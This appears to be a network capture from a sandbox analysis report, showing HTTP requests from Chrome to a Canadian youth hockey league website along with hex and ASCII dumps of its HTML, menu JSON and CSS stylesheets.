                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 36 31 2c 22 6f 72 64 65 72 22 3a 32 37 2c 22 70 61 72 65 6e 74 22 3a 32 30 37 32 2c 22 74 69 74 6c 65 22 3a 22 53 61 66 65 20 53 70 6f 72 74 20 52 65 70 6f 72 74 69 6e 67 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 67 74 68 6c 63 61 6e 61 64 61 2e 63 6f 6d 5c 2f 73 61 66 65 2d 73 70 6f 72 74 2d 72 65 70 6f 72 74 69 6e 67 5c 2f 22 2c 22 61 74 74 72 22 3a 22 22 2c 22 74 61 72 67 65 74 22 3a 22 22 2c 22 63 6c 61 73 73 65 73 22 3a 22 22 2c 22 78 66 6e 22 3a 22 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 6f 62 6a 65 63 74 5f 69 64 22 3a 33 35 39 31 39 2c 22 6f 62 6a 65 63 74 22 3a 22 70 61 67 65 22 2c 22 74 79 70 65 22 3a 22 70 6f 73 74 5f 74 79 70 65 22 2c 22 74 79 70 65 5f 6c 61 62 65 6c 22 3a 22 50 61 67 65 22 7d 2c 7b 22 49 44
                                                                                                                          Data Ascii: 61,"order":27,"parent":2072,"title":"Safe Sport Reporting","url":"https:\/\/gthlcanada.com\/safe-sport-reporting\/","attr":"","target":"","classes":"","xfn":"","description":"","object_id":35919,"object":"page","type":"post_type","type_label":"Page"},{"ID
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 6e 65 74 2f 61 70 70 2f 75 70 6c 6f 61 64 73 2f 67 74 68 6c 2f 32 30 31 39 2f 30 39 2f 30 35 31 34 34 34 32 30 2f 47 54 48 4c 5f 48 65 61 64 65 72 31 37 2d 47 2d 31 30 32 34 78 32 30 30 2d 31 30 32 34 78 32 30 30 2e 6a 70 67 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2e 68 65 61 64 65 72 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 63 30 63 30 63 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 77 69 64 67 65 74 22 20 64 61 74 61 2d 69 64 3d 22 77 69 64 67 65 74 5f 70 61 69 72 73 68 61 70 65 64 5f 74 65 78 74 5f 77 69 64 67 65 74 2d 31 30 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                                                                          Data Ascii: net/app/uploads/gthl/2019/09/05144420/GTHL_Header17-G-1024x200-1024x200.jpg"> </div> <style> .header-banner { background-color: #0c0c0c; } </style> <div class="text-widget" data-id="widget_pairshaped_text_widget-10"> <div class=
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 73 22 3e 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 74 65 78 74 20 77 70 5f 77 69 64 67 65 74 5f 70 6c 75 67 69 6e 5f 62 6f 78 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 63 62 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 63 62 2d 69 74 65 6d 73 20 74 63 62
                                                                                                                          Data Ascii: </div> </div> </div> </div> </div> </div></div><div class="widgets"> <div class="widget-text wp_widget_plugin_box"> <div class="tcb"> <div class="tcb-items tcb
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 22 74 63 62 2d 63 6f 6e 74 65 6e 74 20 63 65 6c 6c 20 73 6d 61 6c 6c 2d 38 20 6c 61 72 67 65 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 65 77 73 2d 70 6f 73 74 5f 5f 74 69 74 6c 65 22 3e 41 72 6f 75 6e 64 20 74 68 65 20 47 3a 20 4e 6f 76 65 6d 62 65 72 20 32 30 32 34 20 50 72 65 76 69 65 77 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: "tcb-content cell small-8 large-12"> <div class="news-post__title">Around the G: November 2024 Preview</div> </div> </a> </div> </div>
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 20 67 72 69 64 2d 78 20 63 65 6c 6c 20 6d 65 64 69 75 6d 2d 32 20 6d 6f 64 75 6c 65 2d 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 63 62 2d 6c 65 66 74 20 63 65 6c 6c 20 6d 65 64 69 75 6d 2d 36 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 2d 68 65 61 64 65 72 5f 5f 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 6c 61 79 53 74 61 74 69 6f 6e 20 50 6c 61 74 69 6e 75 6d 20 43 75 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 63 62
                                                                                                                          Data Ascii: grid-x cell medium-2 module-header"> <div class="tcb-left cell medium-6"> <div class="module-header__title"> PlayStation Platinum Cup </div> </div> <div class="tcb
                                                                                                                          2025-01-13 21:01:13 UTC9232INData Raw: 20 4c 6f 73 73 65 73 22 2c 22 73 68 6f 6f 74 6f 75 74 5f 67 61 6d 65 73 5f 70 6c 61 79 65 64 22 3a 22 53 4f 47 50 22 2c 22 73 68 6f 6f 74 6f 75 74 5f 6c 6f 73 73 65 73 22 3a 22 53 4f 4c 22 2c 22 73 68 6f 6f 74 6f 75 74 5f 6c 6f 73 73 65 73 5f 74 69 74 6c 65 22 3a 22 53 68 6f 6f 74 6f 75 74 20 4c 6f 73 73 65 73 22 2c 22 73 68 6f 6f 74 6f 75 74 5f 73 61 76 65 73 22 3a 22 53 4f 53 56 22 2c 22 73 68 6f 6f 74 6f 75 74 5f 73 61 76 65 73 5f 74 69 74 6c 65 22 3a 22 53 68 6f 6f 74 6f 75 74 20 53 61 76 65 73 22 2c 22 73 68 6f 6f 74 6f 75 74 5f 67 6f 61 6c 73 5f 61 67 61 69 6e 73 74 22 3a 22 53 4f 47 41 22 2c 22 73 68 6f 6f 74 6f 75 74 5f 67 6f 61 6c 73 5f 61 67 61 69 6e 73 74 5f 74 69 74 6c 65 22 3a 22 53 68 6f 6f 74 6f 75 74 20 47 6f 61 6c 73 20 41 67 61 69 6e 73
                                                                                                                          Data Ascii: Losses","shootout_games_played":"SOGP","shootout_losses":"SOL","shootout_losses_title":"Shootout Losses","shootout_saves":"SOSV","shootout_saves_title":"Shootout Saves","shootout_goals_against":"SOGA","shootout_goals_against_title":"Shootout Goals Agains


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.11.2049788137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:13 UTC644OUTGET /app/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.3.5 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:13 UTC492INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:13 GMT
                                                                                                                          Content-Type: text/css
                                                                                                                          Content-Length: 6139
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961971112 961611568
                                                                                                                          Age: 113
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-17fb"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:13 UTC6139INData Raw: 2f 2a 20 49 45 35 2e 35 20 68 61 63 6b 73 20 2a 2f 0a 2a 20 68 74 6d 6c 20 23 6c 61 6e 67 5f 73 65 6c 2c 0a 2a 20 68 74 6d 6c 20 23 6c 61 6e 67 5f 73 65 6c 5f 6c 69 73 74 20 7b 0a 20 20 77 69 64 74 68 3a 20 31 32 65 6d 3b 0a 7d 0a 2a 20 68 74 6d 6c 20 23 6c 61 6e 67 5f 73 65 6c 20 61 2c 0a 2a 20 68 74 6d 6c 20 23 6c 61 6e 67 5f 73 65 6c 5f 6c 69 73 74 20 61 20 7b 0a 20 20 77 69 64 74 68 3a 20 31 34 39 70 78 3b 0a 7d 0a 2a 20 68 74 6d 6c 20 23 6c 61 6e 67 5f 73 65 6c 20 61 3a 76 69 73 69 74 65 64 2c 0a 2a 20 68 74 6d 6c 20 23 6c 61 6e 67 5f 73 65 6c 5f 6c 69 73 74 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 77 69 64 74 68 3a 20 31 34 39 70 78 3b 0a 7d 0a 2a 20 68 74 6d 6c 20 23 6c 61 6e 67 5f 73 65 6c 20 75 6c 20 75 6c 2c 0a 2a 20 68 74 6d 6c 20 23 6c 61
                                                                                                                          Data Ascii: /* IE5.5 hacks */* html #lang_sel,* html #lang_sel_list { width: 12em;}* html #lang_sel a,* html #lang_sel_list a { width: 149px;}* html #lang_sel a:visited,* html #lang_sel_list a:visited { width: 149px;}* html #lang_sel ul ul,* html #la


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.11.2049790137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:13 UTC635OUTGET /app/plugins/latest_news/public/css/latest-news-public.css?ver=1.0.0 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:13 UTC493INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:13 GMT
                                                                                                                          Content-Type: text/css
                                                                                                                          Content-Length: 97372
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961513647 961417539
                                                                                                                          Age: 79
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-17c5c"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:13 UTC15891INData Raw: 2f 2a 2a 0a 20 2a 20 46 6f 75 6e 64 61 74 69 6f 6e 20 66 6f 72 20 53 69 74 65 73 20 62 79 20 5a 55 52 42 0a 20 2a 20 56 65 72 73 69 6f 6e 20 36 2e 34 2e 34 2d 72 63 31 0a 20 2a 20 66 6f 75 6e 64 61 74 69 6f 6e 2e 7a 75 72 62 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 4f 70 65 6e 20 53 6f 75 72 63 65 0a 20 2a 2f 0a 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 32 2c 0a 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 33 2c 0a 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 34 20 7b 0a 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 20 7d 0a 20 20 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 32 20 2e 74 63 62 2d 63 6f 6e 74 65 6e 74 2c 0a 20 20 20 2e 74 63 62 20 2e 74 63 62 2d 69 74
                                                                                                                          Data Ascii: /** * Foundation for Sites by ZURB * Version 6.4.4-rc1 * foundation.zurb.com * Licensed under MIT Open Source */ .tcb .tcb-items-2, .tcb .tcb-items-3, .tcb .tcb-items-4 { margin-bottom: 15px; } .tcb .tcb-items-2 .tcb-content, .tcb .tcb-it
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 6e 74 61 69 6e 65 72 2d 62 6f 74 74 6f 6d 20 2e 73 6d 61 6c 6c 2d 31 32 20 7b 0a 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 30 65 30 65 30 3b 20 7d 0a 20 20 20 20 20 20 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 35 20 2e 74 63 62 2d 63 6f 6e 74 65 6e 74 2d 69 74 65 6d 73 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 67 72 69 64 2d 78 2e 63 6f 6e 74 61 69 6e 65 72 2d 74 6f 70 20 2e 73 6d 61 6c 6c 2d 31 32 20 2e 74 63 62 2d 70 68 6f 74 6f 2c 0a 20 20 20 20 20 20 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 35 20 2e 74 63 62 2d 63 6f 6e 74 65 6e 74 2d 69 74 65 6d 73 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 67 72 69 64 2d
                                                                                                                          Data Ascii: ntainer-bottom .small-12 { border-right: none; border-bottom: 1px solid #e0e0e0; } .tcb .tcb-items-5 .tcb-content-items-container .grid-x.container-top .small-12 .tcb-photo, .tcb .tcb-items-5 .tcb-content-items-container .grid-
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 20 20 20 20 77 69 64 74 68 3a 20 32 30 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 75 70 2d 36 20 3e 20 2e 63 65 6c 6c 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 31 36 2e 36 36 36 36 37 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 75 70 2d 37 20 3e 20 2e 63 65 6c 6c 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 31 34 2e 32 38 35 37 31 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 75 70 2d 38 20 3e 20 2e 63 65 6c 6c 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 31 32 2e 35 25 3b 20 7d 20 7d 0a 20 0a 20 2e 67 72 69 64 2d 6d 61 72 67 69 6e 2d 78 2e 73 6d 61 6c 6c 2d 75 70 2d 31 20 3e 20 2e 63 65 6c 6c 20 7b 0a 20 20 20 77 69 64 74 68 3a 20 63 61 6c 63 28 31 30 30 25 20 2d 20 31 2e 32 35 72 65 6d 29 3b 20 7d 0a 20 0a 20 2e 67 72 69 64 2d 6d 61 72 67
                                                                                                                          Data Ascii: width: 20%; } .xlarge-up-6 > .cell { width: 16.66667%; } .xlarge-up-7 > .cell { width: 14.28571%; } .xlarge-up-8 > .cell { width: 12.5%; } } .grid-margin-x.small-up-1 > .cell { width: calc(100% - 1.25rem); } .grid-marg
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 6c 6c 61 70 73 65 20 3e 20 2e 6c 61 72 67 65 2d 34 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 33 33 2e 33 33 33 33 33 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 6d 61 72 67 69 6e 2d 63 6f 6c 6c 61 70 73 65 20 3e 20 2e 6c 61 72 67 65 2d 35 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 34 31 2e 36 36 36 36 37 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 6d 61 72 67 69 6e 2d 63 6f 6c 6c 61 70 73 65 20 3e 20 2e 6c 61 72 67 65 2d 36 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 6d 61 72 67 69 6e 2d 63 6f 6c 6c 61 70 73 65 20 3e 20 2e 6c 61 72 67 65 2d 37 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 35 38 2e 33 33 33 33 33 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 6d 61 72 67 69 6e 2d 63 6f 6c
                                                                                                                          Data Ascii: llapse > .large-4 { width: 33.33333%; } .xlarge-margin-collapse > .large-5 { width: 41.66667%; } .xlarge-margin-collapse > .large-6 { width: 50%; } .xlarge-margin-collapse > .large-7 { width: 58.33333%; } .xlarge-margin-col
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 74 3a 20 63 61 6c 63 28 34 31 2e 36 36 36 36 37 25 20 2d 20 31 2e 38 37 35 72 65 6d 29 3b 20 7d 0a 20 20 20 20 20 2e 67 72 69 64 2d 6d 61 72 67 69 6e 2d 79 20 3e 20 2e 6d 65 64 69 75 6d 2d 36 20 7b 0a 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 63 61 6c 63 28 35 30 25 20 2d 20 31 2e 38 37 35 72 65 6d 29 3b 20 7d 0a 20 20 20 20 20 2e 67 72 69 64 2d 6d 61 72 67 69 6e 2d 79 20 3e 20 2e 6d 65 64 69 75 6d 2d 37 20 7b 0a 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 63 61 6c 63 28 35 38 2e 33 33 33 33 33 25 20 2d 20 31 2e 38 37 35 72 65 6d 29 3b 20 7d 0a 20 20 20 20 20 2e 67 72 69 64 2d 6d 61 72 67 69 6e 2d 79 20 3e 20 2e 6d 65 64 69 75 6d 2d 38 20 7b 0a 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 63 61 6c 63 28 36 36 2e 36 36 36 36 37 25 20 2d 20 31 2e 38 37
                                                                                                                          Data Ascii: t: calc(41.66667% - 1.875rem); } .grid-margin-y > .medium-6 { height: calc(50% - 1.875rem); } .grid-margin-y > .medium-7 { height: calc(58.33333% - 1.875rem); } .grid-margin-y > .medium-8 { height: calc(66.66667% - 1.87
                                                                                                                          2025-01-13 21:01:14 UTC15945INData Raw: 20 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 20 7d 0a 20 0a 20 2e 61 6c 69 67 6e 2d 6c 65 66 74 20 7b 0a 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 73 74 61 72 74 3b 20 7d 0a 20 0a 20 2e 61 6c 69 67 6e 2d 72 69 67 68 74 20 7b 0a 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 3b 20 7d 0a 20 0a 20 2e 61 6c 69 67 6e 2d 63 65 6e 74 65 72 20 7b 0a 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 20 7d 0a 20 0a 20 2e 61 6c 69 67 6e 2d 6a 75 73 74 69 66 79 20 7b 0a 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 20 7d 0a 20 0a 20 2e 61 6c 69 67 6e 2d 73 70 61 63 65 64 20 7b 0a 20 20 20 6a 75 73
                                                                                                                          Data Ascii: block !important; } } .align-left { justify-content: flex-start; } .align-right { justify-content: flex-end; } .align-center { justify-content: center; } .align-justify { justify-content: space-between; } .align-spaced { jus


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.11.2049791137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:13 UTC655OUTGET /app/plugins/tagged_content_blocks/public/css/tagged-content-blocks-public.css?ver=1.0.0 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:13 UTC493INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:13 GMT
                                                                                                                          Content-Type: text/css
                                                                                                                          Content-Length: 97370
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961677538 961513522
                                                                                                                          Age: 79
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-17c5a"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:13 UTC15891INData Raw: 2f 2a 2a 0a 20 2a 20 46 6f 75 6e 64 61 74 69 6f 6e 20 66 6f 72 20 53 69 74 65 73 20 62 79 20 5a 55 52 42 0a 20 2a 20 56 65 72 73 69 6f 6e 20 36 2e 34 2e 34 2d 72 63 31 0a 20 2a 20 66 6f 75 6e 64 61 74 69 6f 6e 2e 7a 75 72 62 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 4f 70 65 6e 20 53 6f 75 72 63 65 0a 20 2a 2f 0a 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 32 2c 0a 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 33 2c 0a 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 34 20 7b 0a 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 20 7d 0a 20 20 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 32 20 2e 74 63 62 2d 63 6f 6e 74 65 6e 74 2c 0a 20 20 20 2e 74 63 62 20 2e 74 63 62 2d 69 74
                                                                                                                          Data Ascii: /** * Foundation for Sites by ZURB * Version 6.4.4-rc1 * foundation.zurb.com * Licensed under MIT Open Source */ .tcb .tcb-items-2, .tcb .tcb-items-3, .tcb .tcb-items-4 { margin-bottom: 15px; } .tcb .tcb-items-2 .tcb-content, .tcb .tcb-it
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 74 61 69 6e 65 72 2d 62 6f 74 74 6f 6d 20 2e 73 6d 61 6c 6c 2d 31 32 20 7b 0a 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 30 65 30 65 30 3b 20 7d 0a 20 20 20 20 20 20 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 35 20 2e 74 63 62 2d 63 6f 6e 74 65 6e 74 2d 69 74 65 6d 73 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 67 72 69 64 2d 78 2e 63 6f 6e 74 61 69 6e 65 72 2d 74 6f 70 20 2e 73 6d 61 6c 6c 2d 31 32 20 2e 74 63 62 2d 70 68 6f 74 6f 2c 0a 20 20 20 20 20 20 20 2e 74 63 62 20 2e 74 63 62 2d 69 74 65 6d 73 2d 35 20 2e 74 63 62 2d 63 6f 6e 74 65 6e 74 2d 69 74 65 6d 73 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 67 72 69 64 2d 78
                                                                                                                          Data Ascii: tainer-bottom .small-12 { border-right: none; border-bottom: 1px solid #e0e0e0; } .tcb .tcb-items-5 .tcb-content-items-container .grid-x.container-top .small-12 .tcb-photo, .tcb .tcb-items-5 .tcb-content-items-container .grid-x
                                                                                                                          2025-01-13 21:01:13 UTC16384INData Raw: 20 20 77 69 64 74 68 3a 20 32 30 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 75 70 2d 36 20 3e 20 2e 63 65 6c 6c 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 31 36 2e 36 36 36 36 37 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 75 70 2d 37 20 3e 20 2e 63 65 6c 6c 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 31 34 2e 32 38 35 37 31 25 3b 20 7d 0a 20 20 20 2e 78 6c 61 72 67 65 2d 75 70 2d 38 20 3e 20 2e 63 65 6c 6c 20 7b 0a 20 20 20 20 20 77 69 64 74 68 3a 20 31 32 2e 35 25 3b 20 7d 20 7d 0a 20 0a 20 2e 67 72 69 64 2d 6d 61 72 67 69 6e 2d 78 2e 73 6d 61 6c 6c 2d 75 70 2d 31 20 3e 20 2e 63 65 6c 6c 20 7b 0a 20 20 20 77 69 64 74 68 3a 20 63 61 6c 63 28 31 30 30 25 20 2d 20 31 2e 32 35 72 65 6d 29 3b 20 7d 0a 20 0a 20 2e 67 72 69 64 2d 6d 61 72 67 69 6e
